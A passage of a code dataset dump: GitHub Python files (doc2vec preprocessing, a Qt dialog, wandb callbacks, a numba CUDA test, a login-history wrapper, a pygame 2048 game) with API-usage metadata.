"utils.orchestra_utils.return_timed_spine", "line_number": 175, "usage_type": "call"}, {"api_name": "utils.misc_utils.calculate_accident_pct", "line_number": 179, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.sampler", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.sampler", "line_number": 195, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 253, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 254, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 258, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 262, "usage_type": "call"}, {"api_name": 
"pandas.merge", "line_number": 279, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 283, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 305, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 323, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 324, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 339, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 342, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.rinse_spines", "line_number": 355, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.rinse_spines", "line_number": 356, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.preprocessor", "line_number": 363, "usage_type": "call"}]}
+{"seq_id": "6950204701", "text": "import re\r\nimport jieba # 结巴分词,将中文句子分成词语列表\r\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument # 用于进行doc2vec学习,将文章段落转化为向量\r\n\r\n\r\n# 从文件中按行读取数据并且去除空行,存储为一个list,返回该list\r\ndef get_data(in_file):\r\n data = []\r\n for i in open(in_file, 'r', encoding='utf-8').readlines():\r\n if i != '\\n':\r\n i = re.sub(r'\\n', '', i)\r\n data.append(i)\r\n return data\r\n\r\n\r\ndef wash_data(sentence):\r\n # 结巴分词\r\n seg_list = jieba.cut(sentence)\r\n # 去除停用词\r\n stopwords = open('stopword.txt', 'r', encoding='utf-8').read()\r\n stopwords = stopwords.split('\\n')\r\n corpus = []\r\n for i in seg_list:\r\n if i not in stopwords:\r\n corpus.append(i)\r\n return corpus\r\n\r\n\r\nmodel = Doc2Vec.load('model_0.0.1.md')\r\nd = get_data('medicine.txt')\r\nout_a = open('X.txt', 'w', encoding='utf-8')\r\n\r\ns1, s2, mdc = [], [], []\r\nfor line in d:\r\n if not re.search('【', line):\r\n s1.append(line)\r\n elif re.search('【组成】', line):\r\n line = re.sub('【组成】', '', line)\r\n m = line.split()\r\n s2.append(m[0])\r\n for x in m:\r\n if x not in mdc:\r\n mdc.append(x)\r\n elif re.search('【主治】', line):\r\n line = re.sub('【主治】', '', line)\r\n out_a.write(str(model.infer_vector(wash_data(line),alpha=0,min_alpha=0,steps=1))+'\\n')\r\nout_a.close()\r\n\r\nout_b = open('Y.txt', 'w', encoding='utf-8')\r\nout_b.write(str(mdc)+'\\n')\r\n\r\nfor i in range(len(s2)):\r\n y = [0] * len(mdc)\r\n j = mdc.index(s2[i])\r\n y[j] = 1\r\n out_b.write(s1[i]+'\\n')\r\n out_b.write(str(y)+'\\n')\r\nout_b.close()\r\n", "repo_name": "ccmeffeng/TCM", "sub_path": "zy_0.2.1.py", "file_name": "zy_0.2.1.py", "file_ext": "py", "file_size_in_byte": 1734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.sub", "line_number": 11, "usage_type": "call"}, {"api_name": "jieba.cut", "line_number": 18, "usage_type": "call"}, {"api_name": "gensim.models.doc2vec.Doc2Vec.load", "line_number": 29, "usage_type": "call"}, {"api_name": "gensim.models.doc2vec.Doc2Vec", "line_number": 29, "usage_type": "name"}, {"api_name": "re.search", "line_number": 35, "usage_type": "call"}, {"api_name": "re.search", "line_number": 37, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 38, "usage_type": "call"}, {"api_name": "re.search", "line_number": 44, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "38174837083", "text": "import logging\n\nfrom qtpy.QtWidgets import QDialog, QDialogButtonBox, QTextEdit, QVBoxLayout\n\nlogger = logging.getLogger(__name__)\n\n\nclass DialogViewMetadata(QDialog):\n def __init__(self):\n super().__init__()\n\n self.resize(500, 500)\n self.setWindowTitle(\"Run Metadata\")\n\n self.te_meta = QTextEdit()\n self.te_meta.setReadOnly(True)\n\n # 'Close' button box\n button_box = QDialogButtonBox(QDialogButtonBox.Close)\n button_box.accepted.connect(self.accept)\n button_box.rejected.connect(self.reject)\n\n vbox = QVBoxLayout()\n vbox.addWidget(self.te_meta)\n vbox.addWidget(button_box)\n self.setLayout(vbox)\n\n def setText(self, text):\n self.te_meta.setText(text)\n", "repo_name": "NSLS-II/PyXRF", "sub_path": "pyxrf/gui_module/dlg_view_metadata.py", "file_name": "dlg_view_metadata.py", "file_ext": "py", "file_size_in_byte": 755, "program_lang": "python", "lang": "fa", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QDialog", "line_number": 8, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTextEdit", "line_number": 15, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QDialogButtonBox", "line_number": 19, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QDialogButtonBox.Close", "line_number": 19, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "31047754712", "text": "import os\nfrom pathlib import Path\nfrom typing import Any, Dict, Optional\n\nimport numpy as np\nimport pytorch_lightning\nfrom omegaconf import DictConfig\nfrom pytorch_lightning import Callback, LightningModule, Trainer\nfrom pytorch_lightning.callbacks import ModelSummary\nfrom pytorch_lightning.loggers import LoggerCollection, WandbLogger\nfrom pytorch_lightning.utilities import rank_zero_only\nfrom torch.optim import Optimizer\n\nimport wandb\nfrom capit.base import utils\n\nlogger = utils.get_logger(__name__)\n\n\ndef get_wandb_logger(trainer: Trainer) -> WandbLogger:\n \"\"\"Safely get Weights&Biases logger from Trainer.\"\"\"\n\n if trainer.fast_dev_run:\n raise ValueError(\n \"Cannot use wandb callbacks since pytorch lightning disables loggers in \"\n \"`fast_dev_run=true` mode.\"\n )\n\n if isinstance(trainer.logger, WandbLogger):\n return trainer.logger\n\n if isinstance(trainer.logger, LoggerCollection):\n for logger in trainer.logger:\n if isinstance(logger, WandbLogger):\n return logger\n\n raise ValueError(\n \"You are using wandb related callback, but WandbLogger was not found for \"\n \"some reason...\"\n )\n\n\nclass UploadCodeAsArtifact(Callback):\n \"\"\"Upload all code files to wandb as an artifact, at the beginning of the run.\"\"\"\n\n def __init__(self, code_dir: str):\n \"\"\"\n\n Args:\n code_dir: the code directory\n use_git: if using git, then upload all files that are not ignored by git.\n if not using git, then upload all '*.py' file\n \"\"\"\n self.code_dir = code_dir\n\n @rank_zero_only\n def on_train_start(self, trainer: Trainer, pl_module: LightningModule):\n logger = get_wandb_logger(trainer=trainer)\n experiment = logger.experiment\n\n code = wandb.Artifact(\"project-source\", type=\"code\")\n\n for path in Path(self.code_dir).resolve().rglob(\"*.py\"):\n code.add_file(str(path), name=str(path.relative_to(self.code_dir)))\n\n experiment.log_artifact(code)\n\n\nclass LogConfigInformation(Callback):\n \"\"\"Logs a validation batch and their predictions to wandb.\n Example adapted from:\n https://wandb.ai/wandb/wandb-lightning/reports/Image-Classification-using-PyTorch-Lightning--VmlldzoyODk1NzY\n \"\"\"\n\n def __init__(self, exp_config: DictConfig = None):\n super().__init__()\n self.done = False\n self.exp_config = exp_config\n\n @rank_zero_only\n def on_batch_start(self, trainer: Trainer, pl_module: LightningModule) -> None:\n if not self.done:\n logger = get_wandb_logger(trainer=trainer)\n\n trainer_hparams = trainer.__dict__.copy()\n\n hparams = {\n \"trainer\": trainer_hparams,\n \"config\": self.exp_config,\n }\n\n logger.log_hyperparams(hparams)\n self.done = True\n", "repo_name": "AntreasAntoniou/CAPIT", "sub_path": "capit/base/callbacks/wandb_callbacks.py", "file_name": "wandb_callbacks.py", "file_ext": "py", "file_size_in_byte": 2897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "capit.base.utils.get_logger", "line_number": 17, "usage_type": "call"}, {"api_name": "capit.base.utils", "line_number": 17, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 20, "usage_type": "name"}, {"api_name": "pytorch_lightning.loggers.WandbLogger", "line_number": 29, "usage_type": "argument"}, {"api_name": "pytorch_lightning.loggers.LoggerCollection", "line_number": 32, "usage_type": "argument"}, {"api_name": "pytorch_lightning.loggers.WandbLogger", "line_number": 34, "usage_type": "argument"}, {"api_name": 
"pytorch_lightning.loggers.WandbLogger", "line_number": 20, "usage_type": "name"}, {"api_name": "pytorch_lightning.Callback", "line_number": 43, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 57, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 57, "usage_type": "name"}, {"api_name": "wandb.Artifact", "line_number": 61, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 63, "usage_type": "call"}, {"api_name": "pytorch_lightning.utilities.rank_zero_only", "line_number": 56, "usage_type": "name"}, {"api_name": "pytorch_lightning.Callback", "line_number": 69, "usage_type": "name"}, {"api_name": "omegaconf.DictConfig", "line_number": 75, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 81, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 81, "usage_type": "name"}, {"api_name": "pytorch_lightning.utilities.rank_zero_only", "line_number": 80, "usage_type": "name"}]}
+{"seq_id": "72796762970", "text": "from numba import jit, vectorize\nfrom numba import cuda\nimport numpy as np\nimport math\n\nn = 1000000\nrho1 = np.random.uniform(0.5, 1.5, size=n).astype(np.float32)\ntheta1 = np.random.uniform(-np.pi, np.pi, size=n).astype(np.float32)\n\n\n@vectorize(['float32(float32,float32)'], target='cuda')\ndef hypot(x, y):\n return x * math.sqrt(1.+y*y)\n\n\n@cuda.jit(device=True, inline=True)\ndef H(x: np.float32):\n if x < 0.0 or x > 1.0:\n return 0.0\n if x == 0.0:\n return 0\n if x == 1.0:\n return 0\n return (-x*math.log(x)-(1-x)*math.log(1-x))/math.log(2)\n\n\n@cuda.jit(device=True, inline=True)\ndef binom(a: np.uint32, b: np.uint32):\n return a*b # TODO not implemented math.comb(a, b)\n\n\n@cuda.jit\ndef bbinom(c, a, b):\n idx = cuda.grid(1)\n c[idx] = binom(a[idx], b[idx])\n\n\n@cuda.jit(device=True, inline=True)\ndef binomH(a: np.float32, b: np.float32):\n return H(b/a)\n\n\n@cuda.jit\ndef bbinomH(c, a, b):\n idx = cuda.grid(1)\n c[idx] = binomH(a[idx], b[idx])\n\n\n@cuda.jit(device=True, inline=True)\ndef log2(a: np.uint32):\n return math.log(a, 2)\n\n\n@cuda.jit\ndef llog2(c, a):\n idx = cuda.grid(1)\n c[idx] = log2(a[idx])\n\n\n@cuda.jit\ndef hypot1(z, x, y):\n idx = cuda.grid(1)\n z[idx] = x[idx] * math.sqrt(1.+y[idx]*y[idx])\n\n\ndef opt_exp_mmt(k: np.float32, w: np.float32, mem: np.float32, mode: bool):\n \"\"\"\n mode = true\n \"\"\"\n mini_t = 0\n idx = np.uint32(cuda.grid(1))\n stride = np.uint32(cuda.gridsize(1))\n stride = np.float32(stride) * 0.0001\n\n p = np.float32(0.0001)*idx\n l = np.float32(0.0001)*idx\n\n while p < 0.01:\n p += stride\n while l < np.float32(1-k):\n l += np.float32(0.0005)\n # for l2 in float_range(0., 1.-k-w+p, 0.01):\n reps1 = binomH(p, p/2.)\n l1 = reps1\n l2 = l - l1\n\n if l1 < 0 or l2 < 0 or l > 1-k-w-p or (w-p) > (1.-k-l) or p >= k+l-w:\n continue\n\n tmp = binomH((k+l)/2, p/4.)\n L1 = tmp\n L2 = 2*L1 - (L1 if mode else l1)\n L3 = 2*L2 - l2 \n\n space = max(max(L1/2, L2), L3)\n #if space > mem:\n # continue\n\n perms = binomH(1, w) - binomH(1.-k-l, w-p) - binomH(k+l, p)\n run = max(max(L1, L2), L3)\n run += perms \n #+ (max(0, L1-l1) if mode else 0.)\n\n if run_ < mini_t:\n mini_t = run_\n return mini_t\n\n\ndata = hypot(rho1, theta1)\nprint(data)\n\nthreadsperblock = 32\nblockspergrid = (n + (threadsperblock - 1)) // threadsperblock\nd_rho = cuda.to_device(rho1)\nd_theta = cuda.to_device(theta1)\nd_z = cuda.device_array_like(rho1)\nhypot1[blockspergrid, threadsperblock](d_z, d_rho, d_theta)\ncuda.synchronize()\nprint(d_z.copy_to_host())\n\n\nA = cuda.to_device(np.random.uniform(0.0001, 0.4999, size=n).astype(np.float32))\nB = cuda.to_device(np.random.uniform(0.0001, 0.4999, size=n).astype(np.float32))\nC = cuda.device_array_like(A)\nbbinomH[blockspergrid, threadsperblock](C, A, B)\ncuda.synchronize()\nprint(C.copy_to_host())\n\n\nk = np.float32(0.8)\nw = np.float32(0.2)\nm = np.float32(1.0)\nopt_exp_mmt[blockspergrid, threadsperblock](k, w, m)\n\n", "repo_name": "FloydZ/numba_test", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.random.uniform", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 8, "usage_type": "call"}, {"api_name": 
"numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 8, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 13, "usage_type": "call"}, {"api_name": "numba.vectorize", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 24, "usage_type": "call"}, {"api_name": "numba.cuda.jit", "line_number": 16, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.uint32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numba.cuda.jit", "line_number": 27, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 27, "usage_type": "name"}, {"api_name": "numba.cuda.grid", "line_number": 34, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 34, "usage_type": "name"}, {"api_name": "numba.cuda.jit", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numba.cuda", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numba.cuda.jit", "line_number": 38, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 38, "usage_type": "name"}, {"api_name": "numba.cuda.grid", "line_number": 45, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 45, "usage_type": "name"}, {"api_name": "numba.cuda.jit", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numba.cuda", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.uint32", "line_number": 50, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 51, "usage_type": "call"}, {"api_name": "numba.cuda.jit", "line_number": 49, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 49, "usage_type": "name"}, {"api_name": "numba.cuda.grid", "line_number": 56, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 56, "usage_type": "name"}, {"api_name": "numba.cuda.jit", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numba.cuda", "line_number": 54, "usage_type": "name"}, {"api_name": "numba.cuda.grid", "line_number": 62, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 62, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 63, "usage_type": "call"}, {"api_name": "numba.cuda.jit", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numba.cuda", "line_number": 60, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.uint32", "line_number": 71, "usage_type": "call"}, {"api_name": "numba.cuda.grid", "line_number": 71, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.uint32", "line_number": 72, "usage_type": "call"}, {"api_name": "numba.cuda.gridsize", "line_number": 72, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 81, "usage_type": "call"}, {"api_name": "numba.cuda.to_device", "line_number": 114, "usage_type": "call"}, {"api_name": 
"numba.cuda", "line_number": 114, "usage_type": "name"}, {"api_name": "numba.cuda.to_device", "line_number": 115, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 115, "usage_type": "name"}, {"api_name": "numba.cuda.device_array_like", "line_number": 116, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 116, "usage_type": "name"}, {"api_name": "numba.cuda.synchronize", "line_number": 118, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 118, "usage_type": "name"}, {"api_name": "numba.cuda.to_device", "line_number": 122, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 122, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numba.cuda.to_device", "line_number": 123, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numba.cuda.device_array_like", "line_number": 124, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 124, "usage_type": "name"}, {"api_name": "numba.cuda.synchronize", "line_number": 126, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 126, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 132, "usage_type": "call"}]}
+{"seq_id": "23494923373", "text": "# -*- coding: utf-8 -*-\r\n# Se importa Popen que permite ejecutar comandos de Linux en Python\r\n# Se importa PIPE para manejar la salidas estandar\r\nfrom subprocess import Popen, PIPE\r\n\r\n# Se importa para desplegar mensajes en la salida estandar de errores.\r\nimport sys\r\n#import os\r\n\r\n# Se importa argparse para interpretar parametros\r\nimport argparse\r\nparser = argparse.ArgumentParser()\r\n\r\n# Funcion para normalizar el resultado del script bash\r\ndef normalizarlista(lista_conexiones_ej1):\r\n listaTemp = []\r\n for i in range(0, len(lista_conexiones_ej1)):\r\n listaTemp.append(lista_conexiones_ej1[i].split())\r\n\r\n return listaTemp\r\n\r\n# Funcion para imprimir lista ordenada\r\ndef imprimo_lista(listaConOrdenadas, cabecera, pie):\r\n print(\"{}\\t\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\".format(*cabecera))\r\n for i in range(0, len(listaConOrdenadas)):\r\n print(\"{}\\t\\t{}\\t\\t{}\\t\\t{} {} {}\\t\\t{} {}\\t{}\\t\\t{}\".format(*listaConOrdenadas[i]))\r\n print(\"\\r\")\r\n print(\"{} {} {} {} {} {} {} {} {} {} {} {} {}\".format(*pie))\r\n\r\ndef imprimo_lista_filtrada(listaConOrdenadas, cabecera, pie):\r\n # Se usa el reverso del split, join para unir texto\r\n print(\"\\t\\t \".join(cabecera))\r\n for i in range(0, len(listaConOrdenadas)):\r\n print(\"\\t\\t \".join(listaConOrdenadas[i]))\r\n print(\"\\r\")\r\n print(\" \".join(pie))\r\n print(\"\\r\")\r\n print(\"Cantidad de conexiones listadas para el usuario\", args.usuario, len(listaConOrdenadas), \".\")\r\n\r\ndef filtro(listaConOrdenadas,cabecera):\r\n # Saco el guion que es una bolsa...\r\n for i in range(0,len(listaConOrdenadas)):\r\n del listaConOrdenadas[i][7]\r\n\r\n noHayf=False\r\n\r\n if \"u\" in args.filtro:\r\n listaNueva = list(filter(lambda x: x[0], listaConOrdenadas))\r\n for listaConOrdenadas in listaNueva:\r\n del listaConOrdenadas[0]\r\n del cabecera[0]\r\n else:\r\n listaNueva = listaConOrdenadas\r\n if \"f\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"Fecha\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n del listaNueva[x][i]\r\n del listaNueva[x][i]\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n else:\r\n noHayf=True\r\n if \"t\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"Term\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n if \"h\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"Host\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n if \"c\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"H.Con\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n if noHayf:\r\n del listaNueva[x][i+2]\r\n else:\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n if \"n\" in args.filtro:\r\n for i in range(0,len(cabecera)-1):\r\n if \"H.Des\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n if noHayf:\r\n del listaNueva[x][i+2]\r\n else:\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n if \"d\" in args.filtro:\r\n for i in range(0,len(cabecera)):\r\n if \"T.Con\" == cabecera[i]:\r\n for x in range (0, len(listaNueva)):\r\n if noHayf:\r\n del listaNueva[x][i+2]\r\n else:\r\n del listaNueva[x][i]\r\n del cabecera[i]\r\n\r\n\r\n# Se definen los modificadores\r\nparser.add_argument(\"-u\", \"--usuario\", type=str, help=\"Usuario a desplegar sus conexiones.\", action=\"store\")\r\n\r\nparser.add_argument(\"-r\", \"--redondeo\", help=\"Despĺiega el 
tiempo total de conexiones.\", action=\"store_true\")\r\n\r\n# Se ordena el resultado dependiendo del parametro\r\nparser.add_argument(\"-o\", \"--orden\", type=str, choices=[\"u\", \"t\", \"h\", \"d\"], help=\"Ordena segun el criterio. {u} se ordenara por nombre. {t} se ordena por nombre de terminal. {h} se ordena por host. {d} se ordena por su duracion\")\r\n\r\n#\r\nparser.add_argument(\"-i\", \"--inverso\", help=\"Ordena por orden inverso.\", action=\"store_true\")\r\n\r\n# [-f {u,t,h,f,c,n,d}]\r\nparser.add_argument(\"-f\", \"--filtro\", type=str, choices=[\"u\", \"t\", \"h\", \"f\", \"c\", \"n\", \"d\"], nargs='+', help=\"Filtra por cualquiera de estos valores: {u} \")\r\n\r\n# Validamos que no hayan errores\r\ntry:\r\n args = parser.parse_args()\r\nexcept SystemExit as e:\r\n exit(25)\r\n\r\n# Cargamos el script\r\nej1YParametros = ['/root/ej1_historial_usuarios_conectados.sh']\r\n\r\nej1YParametros.append(\"-u\")\r\nej1YParametros.append(args.usuario)\r\n\r\n# Enviamos los parametros\r\nif args.redondeo:\r\n ej1YParametros.append(\"-r\")\r\n\r\n# Creamos el proceso\r\nproceso = Popen(ej1YParametros, stdout=PIPE, stderr=PIPE)\r\n\r\n# Causa la ejecucion del proceso y trae el resultado\r\nsalida= proceso.communicate()\r\n\r\n# Validamos que el proceso no haya dado errores\r\nif proceso.returncode > 0:\r\n print(salida[0].decode(), file=sys.stderr, end=\"\")\r\n exit(proceso.returncode)\r\n\r\nif salida[1].decode() != \"\":\r\n print(salida[1].decode(), file=sys.stderr, end=\"\")\r\n exit(0)\r\n\r\n# Se carga lista por cada linea obtenida\r\nlista_conexiones_ej1 = salida[0].decode().split(\"\\n\")\r\n\r\n# Se elimina la ultima linea vacia\r\nlista_conexiones_ej1.pop(-1)\r\n\r\n# Aca se puede comenzar a escribir las lineas correspondientes a cada funcion\r\nhayQueOrdenar=False\r\nif not (args.orden == None):\r\n hayQueOrdenar=True\r\n# Hay que filtrar?\r\nhayQueFiltrar=False\r\nif not (args.filtro == None):\r\n hayQueFiltrar=True\r\n# En caso de i se retorna el inverso\r\nesReverso=False\r\nif args.inverso:\r\n esReverso=True\r\n\r\n# Si es necesario normalizar\r\nif hayQueOrdenar:\r\n\r\n # Se normaliza el texto\r\n listaConOrdenadas = normalizarlista(lista_conexiones_ej1)\r\n\r\n cabecera = listaConOrdenadas[0]\r\n pie = listaConOrdenadas[int(len(listaConOrdenadas)) - 1]\r\n\r\n # Borro cebecera y pie. 
Tambien se borra el enter con el objetivo de normalizar y luego ordenar\r\n listaConOrdenadas.pop(0)\r\n listaConOrdenadas.pop(int(len(listaConOrdenadas)) - 1)\r\n listaConOrdenadas.pop(int(len(listaConOrdenadas)) - 1)\r\n\r\n # Ordeno segun lo solicitado\r\n if (args.orden == \"u\"):\r\n listaConOrdenadas = sorted(listaConOrdenadas, key=lambda x: x[0], reverse=esReverso)\r\n\r\n if (args.orden == \"t\"):\r\n listaConOrdenadas = sorted(listaConOrdenadas, key=lambda x: x[1], reverse=esReverso)\r\n\r\n if (args.orden == \"h\"):\r\n listaConOrdenadas = sorted(listaConOrdenadas, key=lambda x: x[2], reverse=esReverso)\r\n\r\n if (args.orden == \"d\"):\r\n listaConOrdenadas = sorted(listaConOrdenadas, key=lambda x: x[9], reverse=esReverso)\r\n\r\n# filtro(listaConOrdenadas)\r\n\r\n # Imprimo el resultado si no hay que filtrar\r\n if not hayQueFiltrar:\r\n imprimo_lista(listaConOrdenadas, cabecera, pie)\r\n\r\n# Hay que filtrar?\r\nif hayQueFiltrar:\r\n # Se normaliza el texto\r\n if not hayQueOrdenar:\r\n listaConOrdenadas = normalizarlista(lista_conexiones_ej1)\r\n\r\n cabecera = listaConOrdenadas[0]\r\n pie = listaConOrdenadas[int(len(listaConOrdenadas)) - 1]\r\n\r\n # Borro cebecera y pie. Tambien se borra el enter con el objetivo de normalizar y luego ordenar\r\n listaConOrdenadas.pop(0)\r\n listaConOrdenadas.pop(int(len(listaConOrdenadas)) - 1)\r\n listaConOrdenadas.pop(int(len(listaConOrdenadas)) - 1)\r\n\r\n if not len(args.filtro) >= 7:\r\n filtro(listaConOrdenadas,cabecera)\r\n imprimo_lista_filtrada(listaConOrdenadas, cabecera, pie)\r\n else:\r\n print(\"Al menos un campo debe estar visible, no pudiendose ocultar todos.\")\r\n exit(20)\r\n\r\n\r\n\r\n\r\n# En caso de que no existan otros modificadores\r\nif not hayQueOrdenar and not hayQueFiltrar:\r\n for i in range(0, len(lista_conexiones_ej1)):\r\n print(lista_conexiones_ej1[i])\r\n", "repo_name": "rsantomauro/Linux-UsuariosConectados", "sub_path": "ej2_historial_usuarios_conectados_exp.py", "file_name": "ej2_historial_usuarios_conectados_exp.py", "file_ext": "py", "file_size_in_byte": 8126, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 136, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 136, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 143, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 147, "usage_type": "attribute"}]}
+{"seq_id": "72541013531", "text": "#!/usr/bin/env python3\n\nimport os\nimport random\n\nimport pygame\n\n\nclass Colors:\n background = (250, 248, 239)\n board_background = (187, 173, 160)\n cell = {\n 0: (205, 193, 180),\n 2: (238, 228, 218),\n 4: (238, 225, 201),\n 8: (243, 178, 122),\n 16: (246, 150, 100),\n 32: (247, 124, 95),\n 64: (247, 95, 59),\n 128: (237, 208, 115),\n 256: (237, 204, 98),\n 512: (237, 201, 80),\n 1024: (237, 197, 63),\n 2048: (237, 194, 46),\n }\n font = {\n 2: (119, 110, 101),\n 4: (119, 110, 101),\n 8: (249, 246, 242),\n 16: (249, 246, 242),\n 32: (249, 246, 242),\n 64: (249, 246, 242),\n 128: (249, 246, 242),\n 256: (249, 246, 242),\n 512: (249, 246, 242),\n 1024: (249, 246, 242),\n 2048: (249, 246, 242),\n }\n header = (238, 228, 218)\n header_font = (119, 110, 101)\n\n\nclass Text:\n def __init__(self, text, color, size):\n self.font = pygame.font.Font(\"OpenSans-Bold.ttf\", size)\n self.text = self.font.render(text, True, color)\n self.width, self.height = self.text.get_size()\n\n def draw(self, x, y):\n G.window.blit(self.text, (x, y))\n\n\nclass RoundedSquare:\n def __init__(self, a, r, color):\n self.a = a\n self.r = r\n self.color = color\n\n def draw(self, x, y):\n pygame.draw.rect(G.window, self.color, (x + self.r, y, self.a - 2 * self.r, self.a))\n pygame.draw.rect(G.window, self.color, (x, y + self.r, self.a, self.a - 2 * self.r))\n 